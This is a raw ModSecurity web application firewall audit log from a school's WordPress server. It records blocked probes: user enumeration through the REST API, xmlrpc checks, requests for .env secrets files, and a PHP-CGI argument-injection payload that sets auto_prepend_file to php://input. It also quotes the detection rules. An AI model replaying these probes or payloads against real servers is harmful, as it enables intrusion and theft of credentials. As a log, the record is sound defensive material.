X-Forwarded-For: 156.249.57.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --247c8e3e-C-- demo.sayHello --247c8e3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --247c8e3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747576485555172 5807 (- - -) Stopwatch2: 1747576485555172 5807; combined=4491, p1=609, p2=3638, p3=32, p4=34, p5=103, sr=118, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247c8e3e-Z-- --16c76d5e-A-- [18/May/2025:21:07:33 +0700] aCnppVewLfDrCkDGIGy8OAAAANI 103.236.140.4 58668 103.236.140.4 8181 --16c76d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --16c76d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c76d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577253855721 2537 (- - -) Stopwatch2: 1747577253855721 2537; combined=1445, p1=451, p2=962, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c76d5e-Z-- --34197906-A-- [18/May/2025:21:07:39 +0700] aCnpq0PRqak7bVuUS6eEwAAAAIs 103.236.140.4 58808 103.236.140.4 8181 --34197906-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34197906-C-- demo.sayHello --34197906-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34197906-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577259735292 5855 (- - -) Stopwatch2: 1747577259735292 5855; combined=4776, p1=605, p2=3928, p3=42, p4=44, p5=94, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34197906-Z-- --c6131667-A-- [18/May/2025:21:11:10 +0700] aCnqflewLfDrCkDGIGy9aQAAAMY 103.236.140.4 36294 103.236.140.4 8181 --c6131667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6131667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6131667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577470980225 2842 (- - -) Stopwatch2: 1747577470980225 2842; combined=1287, p1=415, p2=832, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6131667-Z-- --cff6eb04-A-- [18/May/2025:21:11:18 +0700] aCnqhhir-GlPrFVVKe6exQAAAEI 103.236.140.4 36486 103.236.140.4 8181 --cff6eb04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cff6eb04-C-- demo.sayHello --cff6eb04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff6eb04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577478479694 6424 (- - -) Stopwatch2: 1747577478479694 6424; combined=4869, p1=600, p2=4016, p3=32, p4=35, p5=109, sr=79, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff6eb04-Z-- --7d71db43-A-- [18/May/2025:21:11:29 +0700] aCnqkfypzAd0elWOk7qjzQAAAAw 103.236.140.4 36796 103.236.140.4 8181 --7d71db43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d71db43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d71db43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747577489835047 2883 (- - -) Stopwatch2: 1747577489835047 2883; combined=1295, p1=428, p2=825, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d71db43-Z-- --fe08055e-A-- [18/May/2025:21:11:42 +0700] aCnqnkPRqak7bVuUS6eGNwAAAIY 103.236.140.4 37188 103.236.140.4 8181 --fe08055e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe08055e-C-- demo.sayHello --fe08055e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe08055e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747577502011753 5584 (- - -) Stopwatch2: 1747577502011753 5584; combined=4002, p1=579, p2=3215, p3=33, p4=32, p5=84, sr=74, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe08055e-Z-- --0911e60b-A-- [18/May/2025:21:19:12 +0700] aCnsYPypzAd0elWOk7qnEgAAAAc 103.236.140.4 50264 103.236.140.4 8181 --0911e60b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.3.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.3.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0911e60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0911e60b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747577952122385 777 (- - -) Stopwatch2: 1747577952122385 777; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0911e60b-Z-- --8b855c47-A-- [18/May/2025:21:31:03 +0700] aCnvJ_ypzAd0elWOk7qsYQAAAAo 103.236.140.4 43132 103.236.140.4 8181 --8b855c47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.24.118.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.24.118.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b855c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b855c47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747578663543437 2784 (- - -) Stopwatch2: 1747578663543437 2784; combined=1278, p1=414, p2=835, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b855c47-Z-- --028d8602-A-- [18/May/2025:21:38:11 +0700] aCnw0_ypzAd0elWOk7qvgQAAAAQ 103.236.140.4 49858 103.236.140.4 8181 --028d8602-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 157.245.105.107 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 157.245.105.107 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --028d8602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --028d8602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747579091410130 734 (- - -) Stopwatch2: 1747579091410130 734; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --028d8602-Z-- --41f89838-A-- [18/May/2025:21:42:53 +0700] aCnx7fypzAd0elWOk7qvlQAAAAU 103.236.140.4 49910 103.236.140.4 8181 --41f89838-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.240.193.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.240.193.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --41f89838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f89838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579373651046 2887 (- - -) Stopwatch2: 1747579373651046 2887; combined=1301, p1=443, p2=828, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f89838-Z-- --dfe1bc56-A-- [18/May/2025:21:43:19 +0700] aCnyB_ypzAd0elWOk7qvmAAAAAw 103.236.140.4 49916 103.236.140.4 8181 --dfe1bc56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.78.211.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.78.211.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dfe1bc56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfe1bc56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579399475195 2842 (- - -) Stopwatch2: 1747579399475195 2842; combined=1244, p1=428, p2=787, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfe1bc56-Z-- --77739208-A-- [18/May/2025:21:46:46 +0700] aCny1vypzAd0elWOk7qvrAAAAAY 103.236.140.4 49960 103.236.140.4 8181 --77739208-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.82.23 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --77739208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77739208-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747579606328763 826 (- - -) Stopwatch2: 1747579606328763 826; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77739208-Z-- --01f30a16-A-- [18/May/2025:21:50:12 +0700] aCnzpFewLfDrCkDGIGzHKgAAANg 103.236.140.4 51942 103.236.140.4 8181 --01f30a16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.194.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.194.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --01f30a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01f30a16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579812009726 2677 (- - -) Stopwatch2: 1747579812009726 2677; combined=1289, p1=407, p2=854, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01f30a16-Z-- --a8673935-A-- [18/May/2025:22:51:06 +0700] aCoB6hir-GlPrFVVKe69RgAAAFA 103.236.140.4 50808 103.236.140.4 8181 --a8673935-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a8673935-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8673935-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747583466971932 763 (- - -) Stopwatch2: 1747583466971932 763; combined=289, p1=256, p2=0, p3=0, p4=0, p5=33, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8673935-Z-- --2a489d0e-A-- [18/May/2025:22:51:09 +0700] aCoB7VewLfDrCkDGIGzckQAAAM8 103.236.140.4 50872 103.236.140.4 8181 --2a489d0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2a489d0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a489d0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747583469126687 818 (- - -) Stopwatch2: 1747583469126687 818; combined=347, p1=305, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a489d0e-Z-- --c92b8c40-A-- [18/May/2025:23:03:47 +0700] aCoE40PRqak7bVuUS6et7gAAAJU 103.236.140.4 43524 103.236.140.4 8181 --c92b8c40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.241.172.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.241.172.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c92b8c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c92b8c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747584227258541 2649 (- - -) Stopwatch2: 1747584227258541 2649; combined=1300, p1=410, p2=849, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c92b8c40-Z-- --a97b4c3c-A-- [18/May/2025:23:16:46 +0700] aCoH7hir-GlPrFVVKe7KowAAAE0 103.236.140.4 34646 103.236.140.4 8181 --a97b4c3c-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.235.35.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.235.35.96 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a97b4c3c-C-- --a97b4c3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a97b4c3c-E-- --a97b4c3c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 